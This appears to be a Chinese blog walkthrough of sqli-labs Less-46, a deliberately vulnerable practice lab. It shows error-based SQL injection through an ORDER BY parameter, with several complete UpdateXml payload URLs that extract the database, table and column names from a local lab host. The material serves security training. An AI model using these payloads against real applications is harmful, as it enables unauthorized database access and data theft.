【sqli-labs】 less46 GET -Error based -Numeric -Order By Clause(GET型基于错误的数字型Order By从句注入)
2024-08-31 00:10:53
http://192.168.136.128/sqli-labs-master/Less-46/?sort=1
sort=4时出现报错
说明参数是添加在order by 之后
错误信息没有屏蔽,直接使用UpdateXml函数报错
http://192.168.136.128/sqli-labs-master/Less-46/?sort=4 and UpdateXml(1,concat(0x7e,database(),0x7e),1)%23
http://192.168.136.128/sqli-labs-master/Less-46/?sort=4 and UpdateXml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 3,1),0x7e),1)%23
http://192.168.136.128/sqli-labs-master/Less-46/?sort=4 and UpdateXml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 1,1),0x7e),1)%23
最新文章
- Oracle 中 decode 函数用法
- iOS之UIApplication详解
- X86架构与ARM架构比较(摘录自网络)
- Notepad++快捷键&;正则表达式替换字符串&;插件
- apache配置虚拟目录
- 【转】Qt 事件处理机制 (下篇)
- .Net词汇表中常见缩略语汇总
- crontab 的例子
- Android studio打开项目一直卡住
- 在Vue.js2.0中组件模板子元素数量问题
- Java中的线程协作之Condition
- sublime代码整理
- 函数式语言(Functional language)简单介绍
- HBuilder ,及自用主题
- node2vec应用记录
- LINUX的DNS怎么设置?linux下如何修改DNS地址
- celery.backends.base.NotRegistered.
- PHP支付宝支付开发流程
- Mybatis表关联一对多
- Oracle管理监控之oracle用户管理方法